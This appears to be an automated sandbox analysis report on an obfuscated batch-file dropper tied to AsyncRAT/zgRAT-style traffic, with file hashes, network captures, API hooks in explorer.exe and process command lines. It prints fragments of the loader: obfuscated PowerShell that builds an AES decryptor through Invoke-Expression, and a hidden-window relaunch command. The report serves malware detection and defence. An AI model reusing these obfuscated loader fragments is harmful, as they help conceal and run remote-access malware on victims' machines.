                                                                                                    Preview:ElfChnk......................................=..H?..........................................................................S..l................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................v)....../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9560
                                                                                                    Entropy (8bit):4.558369973546456
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:sLM2sCMjjM+NEMBkTMgtMi6MidMNWpFMBQMVrM++MtMBM0:sLM2FMPM+uMBkTMgtMDMidMNiFMBQMVQ
                                                                                                    MD5:263D664CC474CEC6F47A8DE63477BEDC
                                                                                                    SHA1:33F5E6CD133D54A31E9F66B264F6F393FCF36361
                                                                                                    SHA-256:9728022BC913E5F5FF6D3DE28923AEAC7ECF39533C59272868FDB4849677457A
                                                                                                    SHA-512:6798968F5EDDB9C5A9ADA60CD191ACF06B0E1934AC7AB6D4CAE5631C18EEAD46D599721FB5CAC65666FEA0176EC617AC0FB5D85605E5673A5B405C72D6FCAFD1
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk..).......).......).......)...........Q...S...p......................................................................0..........................................6...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**.......)......83............F..&.......................................................................F.....!...A.A...........83..........v....................)...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7*...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......................I.......I.n.v.o.k.i.n.g. .l.i.c.e.n.s.e. .m.a.n.a.g.e.r. .b.e.c.a.u.s.e. .l.i.c.e.n.s.e./.l.e.a.s.e. .p.o.l.l.i.n.g. .t.i.m.e. .u.p.:. .P.F.N. .M.i.c.r
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 17, DIRTY
                                                                                                    Category:dropped
                                                                                                    Size (bytes):80312
                                                                                                    Entropy (8bit):1.9492917756357486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:IKhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm7UmLcUmWUmnUmHUmxUAhL6d:bY7LU7Y7LU
                                                                                                    MD5:41DAD588FDBAB26368B92CCDA293F0CE
                                                                                                    SHA1:9CD4298F9F3E7B288F66852D1055125E4230146D
                                                                                                    SHA-256:239EC77C0621EFCE814506C9337A4279B138D65DDDB61656B9DD1E03C74A6519
                                                                                                    SHA-512:2687CB764CFF69EA786779F39EDFD985BBCE33D61B8DB645489A81FCD9E709387AC7F2A868CD6AF533B199D2E875E7E02D6A9A0B33546E52625C7F3FA8725AFC
                                                                                                    Malicious:false
                                                                                                    Preview:ElfFile.......................................................................................................................ElfChnk......................................6..89....6.....................................................................K|................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&............................................................................................................*..........**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.2039440277760787
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:MKQgVWd8VcrP+8QNRBEZWTENO4brBT3oU/6y:TN/NVaO8JoU/6y
                                                                                                    MD5:62BFC17D9DD9113C324EC8B9610B3C0C
                                                                                                    SHA1:225E05188513A18CD566AC20FC7975AAB73EF4D1
                                                                                                    SHA-256:356FBF771A10D71AA2751428B8CCFD59E1CC3FC6960FA1370352A490A3F50BF8
                                                                                                    SHA-512:776BBE99AF0CB95DDD117EC3D4026E0551FA1ACEBEEBC9214EF928318277BC22917473C8A1B73C33865ADE64960CF6FCDEA49A6B8F15F550B24BA86A45FB27D5
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.087485950532485
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:QhIivhiuiMidiyiMi3iEiziXviiqYiMciEiri9iuiLsRi11iWiRmiNiHibifiGij:QjZvaQKxQSp
                                                                                                    MD5:1CC05E63A6FFCC50D54F4324BD2C7811
                                                                                                    SHA1:DFE8105D53EBB7B4851DE499C3B1CDAC29BBC539
                                                                                                    SHA-256:1CAFEC0896015276D8F86654E349A1096854B8B03D5A6C658CF1B4EAB4B64AA9
                                                                                                    SHA-512:6287C22B3A4AB4A6134AAB15DB23483C446A069DAF954AE748B135ACE9A9CD69933DCB4F3DDDFDE82BF7E752E674B82F61D4F73355BDFD80ED3DE8E5927ADDAD
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.4025051000319846
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:MVaQLFaLarava7a7aDaraLaja3ava/azafaXa3a7aPaXa/7a/a7aHaDazafa3afq:8LZ
                                                                                                    MD5:840F5AA6E1914C4CDEC9220E2AE4A843
                                                                                                    SHA1:BC75C5EE2A1E2169B36A4874EBF113646A5D034B
                                                                                                    SHA-256:765AC4F4398379F8104B53BA2DE7001075FDA67DD448D503CDF721396B703CAF
                                                                                                    SHA-512:922BDEC8DA3E4D268DB0379F79CD83CB1ABFA51B8AE9AE03D0902F1E79F5779E204E5877227F858ED6873E532615C4F64C5060B93B9F37A88865B9D8D4ADF6DE
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.5632048477611973
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:7haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJ1qXJNXJLJXJxXJBXJfXJKHp:7Q0yUkNYwD8imLEUzL/HXxSzZziM
                                                                                                    MD5:4B7624575B10C7F3CD081E7D724382F1
                                                                                                    SHA1:5966702F939AC4A5FB16900D936ACA3F0B4AB580
                                                                                                    SHA-256:133F9DCBDDD1629567E67B458E39BCC655781C47666EA58E3EE2B7617A2834B8
                                                                                                    SHA-512:E7F3680269B36A3535ED8AAF1AF428222019E5053C3729163B007FC9784805333BAE7D170F57A241F69FDDC2AD08395D92A93598C752EC22F63F9A6D5412EAB3
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.34316192900768
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Yh/mcmtmrmsm1mkmQm6m4mnmdmgmsmnmChmxmom9m2m2mwmO6mTmUm2mRmVmEmmj:Y9gxPuxE9KA
                                                                                                    MD5:4102047428B20D9D4B2D3A26F7151FB4
                                                                                                    SHA1:4451C106BE65D6F70FE2CE347982866CC4BE6E47
                                                                                                    SHA-256:B8EADE7EC54F7A1AAC4F51C6FC2098B46323CE5886767FBD4CCAE07B2ED80106
                                                                                                    SHA-512:6C83D9709DB9B8DFFB985E5AD442E731684C1DA26558821D4BAE55497054C68C6F41AF26D96267E71310FEC21A5379E3A36C8DB0225CF843E23AE8774243B5F0
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.7810586310433003
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:khK2nl2U52N2h2Ii2wAx2wI2ff2iW2R12Qc2nT232v2D232H2D2H272g2U2o2k2H:kpA
                                                                                                    MD5:BDEF891EF7B1AD4CA62DC1D39F0FD231
                                                                                                    SHA1:ECDE709F5B21BA191DDCFFD9436EC690978A5AB7
                                                                                                    SHA-256:D8BF8A393D47CFE4D8FFF074014407F5DA8379DED71CCD3BF49AB99ADDF15134
                                                                                                    SHA-512:95BD06A07515F11FA2121D39D36968F2021CA94CC6FA1F73F7CE252AF9227D6A6339A217CC480443EA7F691D314A558EE00A0876E794310EAAE5C724EE5EA330
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):78408
                                                                                                    Entropy (8bit):4.282609257341318
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:VhuRX0Re7HRuRoRqRWRvkRJRQRERwRMRzRSR5RxR2R/WRDXRRcR9XRB6RpRtRYRW:V7po
                                                                                                    MD5:FC2A863A35C7F702740386CD62F1C7A7
                                                                                                    SHA1:1C4DCC57088F23DA130F149F6C3A31B0F0FBA8F5
                                                                                                    SHA-256:E1174C0D7ABAD83296A9752D992AE06613303B7DF9958D061A3F0D518F403BD9
                                                                                                    SHA-512:E89558CE7EF93C12E03779165C14813FC8FC87D857373D70F6AE642A3FA5CDC8E8E357F8252A47B5F29E45E607CDE94B449F40B9B29552A1E1D68284A2AA31D3
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.261655538470567
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:7hghshy2h0hEhDh9vhghp6hJhFhrh0h7h/h3hNh+hKhWhsUhyzhhFhYhkhghIhoq:7ipkBSqL8wD
                                                                                                    MD5:F80062BC5DE8946E5DF1CDAB26CAD49D
                                                                                                    SHA1:6BFC6C03355920E95FD728C201E6F633A8882845
                                                                                                    SHA-256:51AAFAFE9EE0EB08A7B235FC9F750EADADF0318AC256D630465FFA740DA56E1D
                                                                                                    SHA-512:EDDDD1E0E11F46F6AFB102823BAE53D47407C12AF826488D24C39E4E1E670700F6B3FD0797F0F886FF4C8E91FB6068B9495527BA46B83FC28EA6AAEB4284385F
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.4656427357304675
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:2hOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOV5VqVFlVmV8VV2:2yjbS
                                                                                                    MD5:074EF6F30FDD10C7C48FEF9F16C99AAF
                                                                                                    SHA1:F41C4C8C1D5CC83B057A57FFE4DCF1214E015E55
                                                                                                    SHA-256:D4A6741B9BC6F53FDEF7CC6749F3658B2A5A8417DE73203F7E1EFD74174B08DC
                                                                                                    SHA-512:B9F52C2F1ACE7C09379F86B2C7410555AE2C40910F047153DE92605FCDA093D44D0617FFF905A491D69FD064ABC05B7197898C27A1C8B4F53DBD57F6B4C138FB
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 101, DIRTY
                                                                                                    Category:dropped
                                                                                                    Size (bytes):130984
                                                                                                    Entropy (8bit):4.204698818398912
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:hL5v0NuJKOXvb6mBylNGkVdNWN/3kUbzVVRa6vwVQldASo0RXk9gjdkINbRkmkbH:3hBlIhBl
                                                                                                    MD5:0A228C54719EACC6DB3677E25AE59DC3
                                                                                                    SHA1:3B74DF89B9137319BF8E3C24639473E6AD639FB1
                                                                                                    SHA-256:9A06F45961EC8309AC8E6A0A003505DC399FF13532029DFB79707279BE77B6C7
                                                                                                    SHA-512:D42A62119CB23844EEB9397505AF7F0BBA7D16FC403060331BC52C5E3CC6E7D3B7BB26666D57F1C64844B8A53A736F6A95C709D96E9883E21B827CB73A3E1864
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.261809907415983
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:4/NqObx/88sonUUPgDTYj+rrH41l4o5obbM0Xi1kL3kW3On:UNx/8FonUPDTYCrrH41mi1kL3kW3o
                                                                                                    MD5:DA25C4012DD63CFD6F62F487BE3F23FA
                                                                                                    SHA1:5544AABF1BC4CB47DAB1B3C06DD37DA146E54CB8
                                                                                                    SHA-256:FA6D1DB7335936183782553BDD8E9A4D1D65AE890AD24E8EDA61DA37F8DA0EED
                                                                                                    SHA-512:E55CAF1463BF38A73C4EAD90E6C667B0EEC2867D8B496C7EB2D8FB53623CC9122D77EB048D903F73FC10BE0C04F312857184349121D30D722182C07123F1E0FC
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.396927121782266
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:xh4UEiUEfUE5UE0UEfUEtUEpUEAUELUEvUEcUEJUEBUE3UEHUERUExUEeUEaUEjD:xtyc+S6IO
                                                                                                    MD5:6462E68C1BB0D96E1D661B401E9EFD6B
                                                                                                    SHA1:51292A046054DF2C4239A8BD7118625F150A85E3
                                                                                                    SHA-256:D1D48EE8477EBB1478B4C41BD468E1323859E008EB7B1111DECAE1245DAAAB59
                                                                                                    SHA-512:4B2C51A5159D38615AAE35805D8D4A6A68D56F34D4E6FB06304C8DC67F513FC6BCF897C4F4AFF65BE60DDFA91D8A43D1005EE8A75BDE8BD890FB86D3203A6C96
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.3135221839704165
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:HFRotuoLCZocC60zCwyZowMtHJoUyowMtOAoR5OdVoVlobFoHFo9Uoz0onGfoHYq:l30DyBpm6bLAr1
                                                                                                    MD5:E0A40505C8C2EBF053AB9F18132DBA4E
                                                                                                    SHA1:A75BAF87CCE8593A7403ACCBDB28D311A09C5399
                                                                                                    SHA-256:B5AA7AA283F17A4A0D47184583186CC9D3D6491BD5A20731D6CFEF51CCEB5CB6
                                                                                                    SHA-512:5EDE93E3EF88CCE6E1C1B6A02E152D76514C53202204CF73484E7865FFFC07ACB9A8153347AC56212E78023B3E055906385530C7A71AF0159361143CB8DCDE4C
                                                                                                    Malicious:false
Preview:ElfChnk ... (binary Windows event-log chunk; non-printable bytes omitted; readable UTF-16 strings include Event, xmlns, http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Microsoft-Windows-Eventlog, Guid, {fc65ddd8-d6ef-4962-83d5-6e5cfe9ce1 (truncated in preview))
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):67296
                                                                                                    Entropy (8bit):4.4303032774422935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:tBnGvAFRUyQiBnGvkojlp5mavjGVibT9EB51mXQw5swn1Lpl+ml7Okqp7pZ1o86W:XGv23zGv3PabuNpVKI5R+aTpv
                                                                                                    MD5:3CDE602B37A82D269E05131CF870E614
                                                                                                    SHA1:C0A76E2410137D0BF4E3A89F139BF472691D3F76
                                                                                                    SHA-256:777642A48E98DEE15FE7847B92C77988EF92C4285DC8F0E50329C9AB7606C948
                                                                                                    SHA-512:4D11E7814ECB92D076D342FEAECB8832E5C30B770275CDB98076AD855B87FC654CC040EF37ADDE5022C4C43965CD31DA8A134EC31FF5D0AF2FE88CD4C527DF76
                                                                                                    Malicious:false
Preview:ElfChnk ... (binary Windows event-log chunk; non-printable bytes omitted; readable UTF-16 string: http://schemas.microsoft.com/win/2004/08/events/event)
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.9506400640295167
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:dQZL/EQ97CwGMGkN/yGtbJA5GehgbtdSN+N0aa:dWN/yUbJAcehghdSI
                                                                                                    MD5:1612775A4A7465C0F02095C88146B4D5
                                                                                                    SHA1:DB082396FFAC3E3DBDA18D16260330CEE43F8F4C
                                                                                                    SHA-256:1F57632FB552EC930DD245A28C7472A667DCB86123C10BC55A32020BFFAFAD94
                                                                                                    SHA-512:8324FE7EFE86C4295B7DC0D44D3A66061ECD4729DE6EDF1BFD6B4483F4FDAE847AED803D2234FEE94FB6B8CAEB4F970CA674C4A74BCF9372528EC3B227FF3E71
                                                                                                    Malicious:false
Preview:ElfChnk ... (binary Windows event-log chunk; non-printable bytes omitted; readable UTF-16 strings include Event, xmlns, http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, PowerShell, EventID, Qualifiers, Version)
                                                                                                    Process:C:\Windows\System32\more.com
                                                                                                    File Type:ASCII text, with very long lines (4365), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4922
                                                                                                    Entropy (8bit):5.481345845991629
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:PFHDRp5OkuKvfHxRvV0s87Qo25k2gN23b:PZuKzE2W2a23b
                                                                                                    MD5:6B54F06DFD7D8CF5193C2A467E120043
                                                                                                    SHA1:12399F5D1FB9CEED0D1282ACDEB2AD2F5936464E
                                                                                                    SHA-256:05B4250BF1AA9AC5A48815F5ED71727F2F7353347569CF4C9C90E6AC31868A97
                                                                                                    SHA-512:F17FF75A281A01B94F30F2FC193005D4E9DFDE1D248F6D447E74F629821272FF577D980E66DA381CD6BBD5532753E719E3673E3CA17EF75A710F111254129EDF
                                                                                                    Malicious:false
                                                                                                    Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function cuoF($vrVB){ Invoke-Expression -Verbose -Debug '$TaCK=35[S35ys35te35m35.S35e35cu35r35i35t35y35.35C35ry35pt35o35g35r35ap35hy35.35A35e35s35]:35:35C35r35e35a35te35(35);'.Replace('35', ''); Invoke-Expression -InformationAction Ignore '$TaCK.3sMo3sde3s=[3sS3sys3st3sem3s.3sS3se3sc3su3sr3sit3sy.3sC3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sC3si3sp3sh3se3srM3so3sde3s]3s:3s:3sC3sBC3s;'.Replace('3s', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$TaCK.sRPasRddsRinsRgsR=[sRSsRyssRtsResRmsR.sRSsResRcusRrisRtsRysR.sRCrsRypsRtsRosRgsRrsRapsRhsRysR.sRPsRasRddsRisRngsRMsRosRdsResR]:sR:sRPsRKsRCsRSsR7;'.Replace('sR', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$TaCK.6iKe6iy=6i[S6iy6ist6ie6im.6iC6io6in6iv6ie6ir6it]6i::6iF6ir6io6imB6ias6ie6i66i46iS6itr6ii6in6ig6i("6i
                                                                                                    File type:DOS batch file, ASCII text, with very long lines (5471), with CRLF line terminators
                                                                                                    Entropy (8bit):6.031887642812717
                                                                                                    TrID:
                                                                                                      File name:uy2g7z.bat
                                                                                                      File size:6'277'741 bytes
                                                                                                      MD5:8c978ee76d617722aa91e4541333aed8
                                                                                                      SHA1:3f5b77c057ef8b64aa0da7e9a6af7508eb76605a
                                                                                                      SHA256:973a40fc27269affe13538285a98317ccdbc0846d234cc7d480621bf3944cd2e
                                                                                                      SHA512:ba10ca56d5e407956bac6240df8553d8c508221244616566bf06761ed176d4ffff3bce1cad030a64b6797e9a2b4c65c3ca5027d93cb6f2486a5b8841bcd087c4
                                                                                                      SSDEEP:49152:zyeQsad1CzzSrPqyKyOZgkdwsQNsCp0jAXTWoIVTUKS8ccfdeDRVi1yaOKtMjY:D
                                                                                                      TLSH:D256333815635FBB18ECD22AD8DF7C793B9E5E8548B16CDF42A51C0F0A8E65B391B804
                                                                                                      File Content Preview:@echo off..%wpVuIWTfFebwqsxppHRCnZQffKGCPUeTNZxauqnktyLoIUVsjhuqgDIx%@%QpXprpLahIrVwVZuGjPoCxkPosHzONkrZCDa%%VcjZoAlExNmvWzuSjVteibYHlluy%e%VUrYeLhGooWYlQFveRnQyQGkWhTdBOcfNEBSUwSOmmUHwgXksmguhHBfnhc%%RdeAmRkHoNAHZyDlVZNPkIKoHIYgcwENuVWjiuvFVqVFMyuIepjotm
                                                                                                      Icon Hash:9686878b929a9886
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-13T10:26:07.671914+0100 | 2035595 | ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert | 1 | 45.94.31.176 | 4782 | 192.168.2.5 | 49713 | TCP
TCP packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP
UDP packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 13, 2025 10:26:08.897032022 CET | 65101 | 53 | 192.168.2.5 | 1.1.1.1
Mar 13, 2025 10:26:08.904476881 CET | 53 | 65101 | 1.1.1.1 | 192.168.2.5
DNS query: Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 13, 2025 10:26:08.897032022 CET | 192.168.2.5 | 1.1.1.1 | 0xdd2b | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
DNS answer: Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 13, 2025 10:26:08.904476881 CET | 1.1.1.1 | 192.168.2.5 | 0xdd2b | No error (0) | ipwho.is | (none) | 195.201.57.90 | A (IP address) | IN (0x0001) | false
                                                                                                      • ipwho.is
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49714 | 195.201.57.90 | 443 | 8748 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-13 09:26:11 UTC | 150 | OUT | GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
                                                                                                      Host: ipwho.is
                                                                                                      Connection: Keep-Alive
2025-03-13 09:26:12 UTC | 223 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Thu, 13 Mar 2025 09:26:11 GMT
                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Server: ipwhois
                                                                                                      Access-Control-Allow-Headers: *
                                                                                                      X-Robots-Tag: noindex
                                                                                                      2025-03-13 09:26:12 UTC1064INData Raw: 34 31 63 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 37 33 2e 31 33 2e 31 33 35 2e 32 31 39 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 50 65 6e 6e 73
                                                                                                      Data Ascii: 41c{ "About Us": "https:\/\/ipwhois.io", "ip": "73.13.135.219", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "Penns


Code Manipulations

Function Name | Hook Type | Active in Processes
ZwEnumerateKey | INLINE | explorer.exe
ZwQueryKey | INLINE | explorer.exe
NtQuerySystemInformation | INLINE | explorer.exe
ZwResumeThread | INLINE | explorer.exe
NtDeviceIoControlFile | INLINE | explorer.exe
ZwDeviceIoControlFile | INLINE | explorer.exe
NtEnumerateKey | INLINE | explorer.exe
NtQueryDirectoryFile | INLINE | explorer.exe
ZwEnumerateValueKey | INLINE | explorer.exe
ZwQuerySystemInformation | INLINE | explorer.exe
NtResumeThread | INLINE | explorer.exe
RtlGetNativeSystemInformation | INLINE | explorer.exe
ZwCreateUserProcess | INLINE | explorer.exe
NtQueryDirectoryFileEx | INLINE | explorer.exe
NtQueryKey | INLINE | explorer.exe
NtEnumerateValueKey | INLINE | explorer.exe
ZwQueryDirectoryFileEx | INLINE | explorer.exe
NtCreateUserProcess | INLINE | explorer.exe
ZwQueryDirectoryFile | INLINE | explorer.exe
OpenThread | INLINE | explorer.exe
OpenProcess | INLINE | explorer.exe

Function Name | Hook Type | New Data
ZwEnumerateKey | INLINE | 0xE9 0x98 0x83 0x32 0x2D 0xDF
ZwQueryKey | INLINE | 0xE9 0x9A 0xA3 0x33 0x30 0x0F
NtQuerySystemInformation | INLINE | 0xE9 0x92 0x23 0x32 0x2B 0xBF
ZwResumeThread | INLINE | 0xE9 0x90 0x03 0x32 0x28 0x8F
NtDeviceIoControlFile | INLINE | 0xE9 0x96 0x63 0x33 0x37 0x7F
ZwDeviceIoControlFile | INLINE | 0xE9 0x96 0x63 0x33 0x37 0x7F
NtEnumerateKey | INLINE | 0xE9 0x98 0x83 0x32 0x2D 0xDF
NtQueryDirectoryFile | INLINE | 0xE9 0x90 0x03 0x32 0x2C 0xCF
ZwEnumerateValueKey | INLINE | 0xE9 0x9C 0xC3 0x33 0x31 0x1F
ZwQuerySystemInformation | INLINE | 0xE9 0x92 0x23 0x32 0x2B 0xBF
NtResumeThread | INLINE | 0xE9 0x90 0x03 0x32 0x28 0x8F
RtlGetNativeSystemInformation | INLINE | 0xE9 0x92 0x23 0x32 0x2B 0xBF
ZwCreateUserProcess | INLINE | 0xE9 0x99 0x93 0x31 0x18 0x8F
NtQueryDirectoryFileEx | INLINE | 0xE9 0x9D 0xD3 0x30 0x0A 0xAF
NtQueryKey | INLINE | 0xE9 0x9A 0xA3 0x33 0x30 0x0F
NtEnumerateValueKey | INLINE | 0xE9 0x9C 0xC3 0x33 0x31 0x1F
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x9D 0xD3 0x30 0x0A 0xAF
NtCreateUserProcess | INLINE | 0xE9 0x99 0x93 0x31 0x18 0x8F
ZwQueryDirectoryFile | INLINE | 0xE9 0x90 0x03 0x32 0x2C 0xCF

Function Name | Hook Type | New Data
OpenThread | INLINE | 0xE9 0x92 0x23 0x33 0x3F 0xF1
OpenProcess | INLINE | 0xE9 0x93 0x33 0x35 0x59 0x91

Target ID: 0
Start time: 05:25:32
Start date: 13/03/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" "
Imagebase: 0x7ff662840000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 05:25:32
Start date: 13/03/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7e2000000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 05:25:32
Start date: 13/03/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden"
Imagebase: 0x7ff7785e0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 05:25:34
Start date: 13/03/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" wjzJMHoFZaIaceAGUG "
